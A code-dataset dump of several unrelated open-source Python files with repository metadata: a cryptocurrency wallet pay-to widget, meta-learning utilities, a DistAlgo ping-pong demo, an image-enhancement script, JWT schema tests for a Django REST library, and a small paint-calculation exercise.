ignore_watermark_time = time.time() - 24 * 60 * 60
if last_check_time is None or last_check_time < ignore_watermark_time:
PayToEdit.last_cashaddr_warning = time.time()
message = ("<p>"+
_("One or more of the addresses you have provided has been recognized "+
"as a 'cash address'. For now, this is acceptable but is recommended that you get "+
"in the habit of requesting that anyone who provides you with payment addresses "+
"do so in the form of normal Bitcoin SV addresses.")+
"</p>"+
"<p>"+
_("Within the very near future, various services and applications in the Bitcoin "+
"SV ecosystem will stop accepting 'cash addresses'. It is in your best interest "+
"to make sure you transition over to normal Bitcoin SV addresses as soon as "+
"possible, in order to ensure that you can both be paid, and also get paid.")+
"</p>"
)
util.MessageBox.show_warning(message, title=_("Cash address warning"))
def _parse_tx_output(self, line):
x, y = line.split(',')
script = self._parse_output(x)
if not isinstance(script, Script):
script = script.to_script()
amount = self._parse_amount(y)
return TxOutput(amount, script)
def _parse_output(self, x):
try:
address = self._parse_address(x)
self._show_cashaddr_warning(x)
return address
except:
return Script.from_asm(x)
def _parse_address_text(self, line):
r = line.strip()
m = re.match(RE_ALIAS, r)
return m.group(2) if m else r
def _parse_address(self, line):
address = self._parse_address_text(line)
return Address.from_string(address)
def _parse_amount(self, x):
if x.strip() == '!':
return all
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def _on_text_changed(self):
self.errors = []
if self.is_pr:
return
lines = [i for i in self._lines() if i]
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if is_URI(data):
self.scan_f(data)
return
try:
self.payto_address = self._parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
tx_output = self._parse_tx_output(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append(tx_output)
if tx_output.value is all:
is_max = True
else:
total += tx_output.value
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = all
else:
amount = self.amount_edit.get_amount()
addr = self.payto_address
self.outputs = [TxOutput(amount, addr.to_script())]
return self.outputs[:]
def _lines(self):
return self.toPlainText().split('\n')
def _is_multiline(self):
return len(self._lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
lineHeight = QFontMetrics(self.document().defaultFont()).height()
docHeight = self.document().size().height()
h = docHeight * lineHeight + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def set_completer(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self._insert_completion)
def _insert_completion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = len(completion) - len(self.c.completionPrefix())
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion[-extra:])
self.setTextCursor(tc)
def _get_text_under_cursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self._is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
        ctrlOrShift = e.modifiers() & (Qt.ControlModifier | Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and not e.text()):
return
eow = "~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-="
hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift
completionPrefix = self._get_text_under_cursor()
if hasModifier or not e.text() or len(completionPrefix) < 1 or eow.find(e.text()[-1]) >= 0:
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix)
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0)
+ self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data and data.startswith("bitcoincash:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self._is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
| true
| true
|
1c3ea5c07c06add4518f160f65a5c991fbe69550
| 878
|
py
|
Python
|
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
learn2learn-master/JSrc/jutils.py
|
hikmatkhan/Higher
|
b47c758dbe194abd98847a0f935b51f09ab772b0
|
[
"MIT"
] | null | null | null |
import random
import learn2learn
import numpy as np
import torch
import torchvision
from learn2learn.data import TaskDataset
from learn2learn.data.transforms import NWays, KShots, LoadData
import wandb
from torch import nn
from torchvision.models import resnet18
from torchvision.transforms import transforms
def fix_seeds(seed=101):
# No randomization
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.device_count():
torch.cuda.manual_seed(seed)
return seed
def get_compute_device():
device = torch.device('cpu')
if torch.cuda.device_count():
device = torch.device('cuda')
return device
def init_wandb(args, model=None):
wandb.init(project=args.wand_project, entity=args.username, reinit=True)
wandb.config.update(args)
    if model is not None:
wandb.watch(model, log_freq=10)
| 23.72973
| 76
| 0.736902
|
import random
import learn2learn
import numpy as np
import torch
import torchvision
from learn2learn.data import TaskDataset
from learn2learn.data.transforms import NWays, KShots, LoadData
import wandb
from torch import nn
from torchvision.models import resnet18
from torchvision.transforms import transforms
def fix_seeds(seed=101):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.device_count():
torch.cuda.manual_seed(seed)
return seed
def get_compute_device():
device = torch.device('cpu')
if torch.cuda.device_count():
device = torch.device('cuda')
return device
def init_wandb(args, model=None):
wandb.init(project=args.wand_project, entity=args.username, reinit=True)
wandb.config.update(args)
    if model is not None:
wandb.watch(model, log_freq=10)
| true
| true
|
1c3ea5e937371a3b5efe0501eae3e78cdfc93c6c
| 4,331
|
py
|
Python
|
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
da/examples/pingpong/ping.py
|
yagrawal-sbu/distalgo
|
10e6db89b7db05d3b076dcf9295ce4f189558323
|
[
"MIT"
] | null | null | null |
# -*- generated by 1.0.9 -*-
import da
PatternExpr_177 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_182 = da.pat.FreePattern('p')
PatternExpr_201 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_206 = da.pat.FreePattern('p')
PatternExpr_249 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
PatternExpr_254 = da.pat.FreePattern('rclk')
PatternExpr_274 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
_config_object = {}
import sys
class Pong(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PongReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_0', PatternExpr_177, sources=[PatternExpr_182], destinations=None, timestamps=None, record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_1', PatternExpr_201, sources=[PatternExpr_206], destinations=None, timestamps=None, record_history=None, handlers=[self._Pong_handler_200])])
def setup(self, total_pings, **rest_346):
super().setup(total_pings=total_pings, **rest_346)
self._state.total_pings = total_pings
pass
def run(self):
a = False
super()._label('_st_label_172', block=False)
_st_label_172 = 0
while (_st_label_172 == 0):
_st_label_172 += 1
if (len([p for (_, (_, _, p), (_ConstantPattern193_,)) in self._PongReceivedEvent_0 if (_ConstantPattern193_ == 'Ping')]) == self._state.total_pings):
_st_label_172 += 1
else:
super()._label('_st_label_172', block=True)
_st_label_172 -= 1
def _Pong_handler_200(self, p):
self.output('Pinged')
self.send(('Pong',), to=p)
_Pong_handler_200._labels = None
_Pong_handler_200._notlabels = None
class Ping(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PingReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_0', PatternExpr_249, sources=None, destinations=None, timestamps=[PatternExpr_254], record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_1', PatternExpr_274, sources=None, destinations=None, timestamps=None, record_history=None, handlers=[self._Ping_handler_273])])
def setup(self, p, nrounds, **rest_346):
super().setup(p=p, nrounds=nrounds, **rest_346)
self._state.p = p
self._state.nrounds = nrounds
pass
def run(self):
for i in range(self._state.nrounds):
clk = self.logical_clock()
self.send(('Ping',), to=self._state.p)
super()._label('_st_label_246', block=False)
rclk = None
def ExistentialOpExpr_247():
nonlocal rclk
for (_, (rclk, _, _), (_ConstantPattern265_,)) in self._PingReceivedEvent_0:
if (_ConstantPattern265_ == 'Pong'):
if (rclk > clk):
return True
return False
_st_label_246 = 0
while (_st_label_246 == 0):
_st_label_246 += 1
if ExistentialOpExpr_247():
_st_label_246 += 1
else:
super()._label('_st_label_246', block=True)
_st_label_246 -= 1
else:
if (_st_label_246 != 2):
continue
if (_st_label_246 != 2):
break
def _Ping_handler_273(self):
self.output('Ponged.')
_Ping_handler_273._labels = None
_Ping_handler_273._notlabels = None
class Node_(da.NodeProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._events.extend([])
_config_object = {'clock': 'Lamport'}
def run(self):
nrounds = (int(sys.argv[1]) if (len(sys.argv) > 1) else 3)
npings = (int(sys.argv[2]) if (len(sys.argv) > 2) else 3)
pong = self.new(Pong, [(nrounds * npings)], num=1)
ping = self.new(Ping, num=npings)
self._setup(ping, (pong, nrounds))
self._start(pong)
self._start(ping)
| 41.644231
| 413
| 0.619487
|
import da
PatternExpr_177 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_182 = da.pat.FreePattern('p')
PatternExpr_201 = da.pat.TuplePattern([da.pat.ConstantPattern('Ping')])
PatternExpr_206 = da.pat.FreePattern('p')
PatternExpr_249 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
PatternExpr_254 = da.pat.FreePattern('rclk')
PatternExpr_274 = da.pat.TuplePattern([da.pat.ConstantPattern('Pong')])
_config_object = {}
import sys
class Pong(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PongReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_0', PatternExpr_177, sources=[PatternExpr_182], destinations=None, timestamps=None, record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PongReceivedEvent_1', PatternExpr_201, sources=[PatternExpr_206], destinations=None, timestamps=None, record_history=None, handlers=[self._Pong_handler_200])])
def setup(self, total_pings, **rest_346):
super().setup(total_pings=total_pings, **rest_346)
self._state.total_pings = total_pings
pass
def run(self):
a = False
super()._label('_st_label_172', block=False)
_st_label_172 = 0
while (_st_label_172 == 0):
_st_label_172 += 1
if (len([p for (_, (_, _, p), (_ConstantPattern193_,)) in self._PongReceivedEvent_0 if (_ConstantPattern193_ == 'Ping')]) == self._state.total_pings):
_st_label_172 += 1
else:
super()._label('_st_label_172', block=True)
_st_label_172 -= 1
def _Pong_handler_200(self, p):
self.output('Pinged')
self.send(('Pong',), to=p)
_Pong_handler_200._labels = None
_Pong_handler_200._notlabels = None
class Ping(da.DistProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._PingReceivedEvent_0 = []
self._events.extend([da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_0', PatternExpr_249, sources=None, destinations=None, timestamps=[PatternExpr_254], record_history=True, handlers=[]), da.pat.EventPattern(da.pat.ReceivedEvent, '_PingReceivedEvent_1', PatternExpr_274, sources=None, destinations=None, timestamps=None, record_history=None, handlers=[self._Ping_handler_273])])
def setup(self, p, nrounds, **rest_346):
super().setup(p=p, nrounds=nrounds, **rest_346)
self._state.p = p
self._state.nrounds = nrounds
pass
def run(self):
for i in range(self._state.nrounds):
clk = self.logical_clock()
self.send(('Ping',), to=self._state.p)
super()._label('_st_label_246', block=False)
rclk = None
def ExistentialOpExpr_247():
nonlocal rclk
for (_, (rclk, _, _), (_ConstantPattern265_,)) in self._PingReceivedEvent_0:
if (_ConstantPattern265_ == 'Pong'):
if (rclk > clk):
return True
return False
_st_label_246 = 0
while (_st_label_246 == 0):
_st_label_246 += 1
if ExistentialOpExpr_247():
_st_label_246 += 1
else:
super()._label('_st_label_246', block=True)
_st_label_246 -= 1
else:
if (_st_label_246 != 2):
continue
if (_st_label_246 != 2):
break
def _Ping_handler_273(self):
self.output('Ponged.')
_Ping_handler_273._labels = None
_Ping_handler_273._notlabels = None
class Node_(da.NodeProcess):
def __init__(self, procimpl, props):
super().__init__(procimpl, props)
self._events.extend([])
_config_object = {'clock': 'Lamport'}
def run(self):
nrounds = (int(sys.argv[1]) if (len(sys.argv) > 1) else 3)
npings = (int(sys.argv[2]) if (len(sys.argv) > 2) else 3)
pong = self.new(Pong, [(nrounds * npings)], num=1)
ping = self.new(Ping, num=npings)
self._setup(ping, (pong, nrounds))
self._start(pong)
self._start(ping)
| true
| true
|
1c3ea702689cfcbe442cb760a84ea68038a9b92e
| 4,138
|
py
|
Python
|
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | 1
|
2021-08-09T12:31:27.000Z
|
2021-08-09T12:31:27.000Z
|
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | null | null | null |
Python/create_example_images.py
|
markvilar/focal
|
53b048bc6592b7ad7421ae96c399755570820db6
|
[
"Apache-2.0"
] | null | null | null |
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
plt.style.use("./Styles/Scientific.mplstyle")
import cv2
import numpy as np
from PIL import Image
from skimage.metrics import structural_similarity as ssim
from histogram import plot_histogram, plot_histogram_rgb
def normalize_image(arr):
arrmin = np.min(arr)
arr -= arrmin
arrmax = np.max(arr)
arr *= 255.0 / arrmax
return arr
def save_image(img, path, cmap=None, normalize=None):
fig, ax = plt.subplots()
ax.imshow(img, cmap, norm=normalize, resample=False)
ax.axis("off")
fig.tight_layout(pad=0.0)
fig.savefig(path, dpi=300, bbox_inches="tight")
def main():
img_path = "/home/martin/Data/Example-Images/Image-Color.png"
img_dl_path = "/home/martin/Data/Example-Images/Image-Color-UIENet.png"
clahe_clip = 2.0
clahe_size = 20
blf_diameter = 10
blf_color = 60
blf_space = 20
# Load images.
img = cv2.imread(img_path)
img_uienet = cv2.imread(img_dl_path)
# Convert color images.
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
rgb_img_uienet = cv2.cvtColor(img_uienet, cv2.COLOR_BGR2RGB)
# Compute gray images.
img = cv2.cvtColor(rgb_img, cv2.COLOR_RGB2GRAY)
img_uienet = cv2.cvtColor(rgb_img_uienet, cv2.COLOR_RGB2GRAY)
# Create CLAHE.
clahe = cv2.createCLAHE(clipLimit=clahe_clip, \
tileGridSize=(clahe_size, clahe_size))
# BLF filter.
img_blf = cv2.bilateralFilter(img, blf_diameter, \
blf_color, blf_space)
img_he = cv2.bilateralFilter(cv2.equalizeHist(img), blf_diameter, \
blf_color, blf_space)
img_clahe = cv2.bilateralFilter(clahe.apply(img), blf_diameter, \
blf_color, blf_space)
# Compute difference image.
(_, ssi_blf) = ssim(img, img_blf, \
data_range=img_blf.max() - img_blf.min(), full=True)
(_, ssi_he) = ssim(img, img_he, \
data_range=img_he.max() - img_he.min(), full=True)
(_, ssi_clahe) = ssim(img, img_clahe, \
data_range=img_clahe.max() - img_clahe.min(), full=True)
(_, ssi_uienet) = ssim(img, img_uienet, \
data_range=img_uienet.max() - img_uienet.min(), full=True)
# Calculate RGB image histograms.
hist_rgb = plot_histogram_rgb(rgb_img)
hist_rgb_uienet = plot_histogram_rgb(rgb_img_uienet)
# Calculate grayscale image histograms.
hist = plot_histogram(img)
hist_blf = plot_histogram(img_blf)
hist_he = plot_histogram(img_he)
hist_clahe = plot_histogram(img_clahe)
hist_uienet = plot_histogram(img_uienet)
hist_rgb.savefig("/home/martin/Data/Images/Histogram-RGB.png", dpi=300)
hist_rgb_uienet.savefig("/home/martin/Data/Images/Histogram-RGB-UIENet.png", dpi=300)
hist.savefig("/home/martin/Data/Images/Histogram-Gray.png", dpi=300)
hist_blf.savefig("/home/martin/Data/Images/Histogram-Gray-BLF.png", dpi=300)
hist_he.savefig("/home/martin/Data/Images/Histogram-Gray-HE-BLF.png", dpi=300)
hist_clahe.savefig("/home/martin/Data/Images/Histogram-Gray-CLAHE-BLF.png", dpi=300)
hist_uienet.savefig("/home/martin/Data/Images/Histogram-Gray-UIENet-BLF.png", dpi=300)
# Color images.
save_image(rgb_img, "/home/martin/Data/Images/Image-Color.png")
save_image(rgb_img_uienet, "/home/martin/Data/Images/Image-Color-UIENet.png")
# Gray images.
save_image(img, "/home/martin/Data/Images/Image-Gray.png", "gray")
save_image(img_blf, "/home/martin/Data/Images/Image-Gray-BLF.png", "gray")
save_image(img_he, "/home/martin/Data/Images/Image-Gray-HE-BLF.png", "gray")
save_image(img_clahe, "/home/martin/Data/Images/Image-Gray-CLAHE-BLF.png", "gray")
save_image(img_uienet, "/home/martin/Data/Images/Image-Gray-UIENet.png", "gray")
# Difference images.
save_image(ssi_blf, "/home/martin/Data/Images/Image-SSI-BLF.png", "gray")
save_image(ssi_he, "/home/martin/Data/Images/Image-SSI-HE-BLF.png", "gray")
save_image(ssi_clahe, "/home/martin/Data/Images/Image-SSI-CLAHE-BLF.png", "gray")
save_image(ssi_uienet, "/home/martin/Data/Images/Image-SSI-UIENet.png", "gray")
if __name__ == "__main__":
main()
| 37.279279
| 90
| 0.702997
|
import matplotlib
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
plt.style.use("./Styles/Scientific.mplstyle")
import cv2
import numpy as np
from PIL import Image
from skimage.metrics import structural_similarity as ssim
from histogram import plot_histogram, plot_histogram_rgb
def normalize_image(arr):
arrmin = np.min(arr)
arr -= arrmin
arrmax = np.max(arr)
arr *= 255.0 / arrmax
return arr
def save_image(img, path, cmap=None, normalize=None):
fig, ax = plt.subplots()
ax.imshow(img, cmap, norm=normalize, resample=False)
ax.axis("off")
fig.tight_layout(pad=0.0)
fig.savefig(path, dpi=300, bbox_inches="tight")
def main():
img_path = "/home/martin/Data/Example-Images/Image-Color.png"
img_dl_path = "/home/martin/Data/Example-Images/Image-Color-UIENet.png"
clahe_clip = 2.0
clahe_size = 20
blf_diameter = 10
blf_color = 60
blf_space = 20
img = cv2.imread(img_path)
img_uienet = cv2.imread(img_dl_path)
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
rgb_img_uienet = cv2.cvtColor(img_uienet, cv2.COLOR_BGR2RGB)
img = cv2.cvtColor(rgb_img, cv2.COLOR_RGB2GRAY)
img_uienet = cv2.cvtColor(rgb_img_uienet, cv2.COLOR_RGB2GRAY)
clahe = cv2.createCLAHE(clipLimit=clahe_clip, \
tileGridSize=(clahe_size, clahe_size))
img_blf = cv2.bilateralFilter(img, blf_diameter, \
blf_color, blf_space)
img_he = cv2.bilateralFilter(cv2.equalizeHist(img), blf_diameter, \
blf_color, blf_space)
img_clahe = cv2.bilateralFilter(clahe.apply(img), blf_diameter, \
blf_color, blf_space)
(_, ssi_blf) = ssim(img, img_blf, \
data_range=img_blf.max() - img_blf.min(), full=True)
(_, ssi_he) = ssim(img, img_he, \
data_range=img_he.max() - img_he.min(), full=True)
(_, ssi_clahe) = ssim(img, img_clahe, \
data_range=img_clahe.max() - img_clahe.min(), full=True)
(_, ssi_uienet) = ssim(img, img_uienet, \
data_range=img_uienet.max() - img_uienet.min(), full=True)
hist_rgb = plot_histogram_rgb(rgb_img)
hist_rgb_uienet = plot_histogram_rgb(rgb_img_uienet)
hist = plot_histogram(img)
hist_blf = plot_histogram(img_blf)
hist_he = plot_histogram(img_he)
hist_clahe = plot_histogram(img_clahe)
hist_uienet = plot_histogram(img_uienet)
hist_rgb.savefig("/home/martin/Data/Images/Histogram-RGB.png", dpi=300)
hist_rgb_uienet.savefig("/home/martin/Data/Images/Histogram-RGB-UIENet.png", dpi=300)
hist.savefig("/home/martin/Data/Images/Histogram-Gray.png", dpi=300)
hist_blf.savefig("/home/martin/Data/Images/Histogram-Gray-BLF.png", dpi=300)
hist_he.savefig("/home/martin/Data/Images/Histogram-Gray-HE-BLF.png", dpi=300)
hist_clahe.savefig("/home/martin/Data/Images/Histogram-Gray-CLAHE-BLF.png", dpi=300)
hist_uienet.savefig("/home/martin/Data/Images/Histogram-Gray-UIENet-BLF.png", dpi=300)
save_image(rgb_img, "/home/martin/Data/Images/Image-Color.png")
save_image(rgb_img_uienet, "/home/martin/Data/Images/Image-Color-UIENet.png")
save_image(img, "/home/martin/Data/Images/Image-Gray.png", "gray")
save_image(img_blf, "/home/martin/Data/Images/Image-Gray-BLF.png", "gray")
save_image(img_he, "/home/martin/Data/Images/Image-Gray-HE-BLF.png", "gray")
save_image(img_clahe, "/home/martin/Data/Images/Image-Gray-CLAHE-BLF.png", "gray")
save_image(img_uienet, "/home/martin/Data/Images/Image-Gray-UIENet.png", "gray")
save_image(ssi_blf, "/home/martin/Data/Images/Image-SSI-BLF.png", "gray")
save_image(ssi_he, "/home/martin/Data/Images/Image-SSI-HE-BLF.png", "gray")
save_image(ssi_clahe, "/home/martin/Data/Images/Image-SSI-CLAHE-BLF.png", "gray")
save_image(ssi_uienet, "/home/martin/Data/Images/Image-SSI-UIENet.png", "gray")
if __name__ == "__main__":
main()
| true
| true
|
1c3ea740f67d1f5b875602483a82cf37dd383da5
| 201
|
py
|
Python
|
app/hosts.py
|
noahbarnette/ugahacks5
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 5
|
2020-07-22T19:18:09.000Z
|
2021-02-05T21:30:42.000Z
|
app/hosts.py
|
noahbarnette/ugahacks5
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 9
|
2021-01-27T21:42:51.000Z
|
2022-03-12T00:20:25.000Z
|
app/hosts.py
|
ugahacks/myugahacks
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 1
|
2020-02-04T23:49:12.000Z
|
2020-02-04T23:49:12.000Z
|
from django.conf import settings
from django_hosts import patterns, host
host_patterns = patterns('',
host(r'my', settings.ROOT_URLCONF, name='my'),
host(r'blog', 'blog.urls', name='blog'),
)
| 25.125
| 50
| 0.701493
|
from django.conf import settings
from django_hosts import patterns, host
host_patterns = patterns('',
host(r'my', settings.ROOT_URLCONF, name='my'),
host(r'blog', 'blog.urls', name='blog'),
)
| true
| true
|
1c3ea864d959188af0794e432f2e8ea8da76a496
| 2,763
|
py
|
Python
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 1,025
|
2020-03-03T19:29:49.000Z
|
2022-03-30T03:23:30.000Z
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 677
|
2020-03-06T15:17:31.000Z
|
2022-03-31T20:59:12.000Z
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 145
|
2020-03-10T09:45:44.000Z
|
2022-03-26T19:38:43.000Z
|
from unittest import mock
import pytest
from django.urls import path
from rest_framework import mixins, routers, serializers, viewsets
from tests import assert_schema, generate_schema
try:
from rest_framework_simplejwt.authentication import (
JWTAuthentication, JWTTokenUserAuthentication,
)
from rest_framework_simplejwt.views import (
TokenObtainPairView, TokenObtainSlidingView, TokenRefreshView, TokenVerifyView,
)
except ImportError:
JWTAuthentication = None
class XSerializer(serializers.Serializer):
uuid = serializers.UUIDField()
class XViewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTAuthentication]
required_scopes = ['x:read', 'x:write']
class X2Viewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTTokenUserAuthentication]
required_scopes = ['x:read', 'x:write']
@pytest.mark.contrib('rest_framework_simplejwt')
@pytest.mark.parametrize('view', [XViewset, X2Viewset])
def test_simplejwt(no_warnings, view):
router = routers.SimpleRouter()
router.register('x', view, basename="x")
urlpatterns = [
*router.urls,
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token-sliding/', TokenObtainSlidingView.as_view(), name='token_obtain_sliding'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('token/verify/', TokenVerifyView.as_view(), name='token_verify'),
]
schema = generate_schema(None, patterns=urlpatterns)
assert_schema(schema, 'tests/contrib/test_simplejwt.yml')
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch('rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_TYPES', ('JWT',))
def test_simplejwt_non_bearer_keyword(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'Authorization',
'description': 'Token-based authentication with required prefix "JWT"'
}
}
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch(
'rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_NAME',
'HTTP_X_TOKEN',
create=True,
)
def test_simplejwt_non_std_header_name(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'X-token',
'description': 'Token-based authentication with required prefix "Bearer"'
}
}
| 32.892857
| 94
| 0.704669
|
from unittest import mock
import pytest
from django.urls import path
from rest_framework import mixins, routers, serializers, viewsets
from tests import assert_schema, generate_schema
try:
from rest_framework_simplejwt.authentication import (
JWTAuthentication, JWTTokenUserAuthentication,
)
from rest_framework_simplejwt.views import (
TokenObtainPairView, TokenObtainSlidingView, TokenRefreshView, TokenVerifyView,
)
except ImportError:
JWTAuthentication = None
class XSerializer(serializers.Serializer):
uuid = serializers.UUIDField()
class XViewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTAuthentication]
required_scopes = ['x:read', 'x:write']
class X2Viewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTTokenUserAuthentication]
required_scopes = ['x:read', 'x:write']
@pytest.mark.contrib('rest_framework_simplejwt')
@pytest.mark.parametrize('view', [XViewset, X2Viewset])
def test_simplejwt(no_warnings, view):
router = routers.SimpleRouter()
router.register('x', view, basename="x")
urlpatterns = [
*router.urls,
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token-sliding/', TokenObtainSlidingView.as_view(), name='token_obtain_sliding'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('token/verify/', TokenVerifyView.as_view(), name='token_verify'),
]
schema = generate_schema(None, patterns=urlpatterns)
assert_schema(schema, 'tests/contrib/test_simplejwt.yml')
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch('rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_TYPES', ('JWT',))
def test_simplejwt_non_bearer_keyword(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'Authorization',
'description': 'Token-based authentication with required prefix "JWT"'
}
}
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch(
'rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_NAME',
'HTTP_X_TOKEN',
create=True,
)
def test_simplejwt_non_std_header_name(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'X-token',
'description': 'Token-based authentication with required prefix "Bearer"'
}
}
| true
| true
|
1c3ea900c51ab6a9bddf42c028ecb093a76dbfce
| 188
|
py
|
Python
|
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
h = float(input('Enter the height (m) of your wall:\n'))
c = float(input('Enter the length (m) of your wall:\n'))
print(f'Your wall has an area of {c*h}m² and will use {c*h/2}L of paint!')
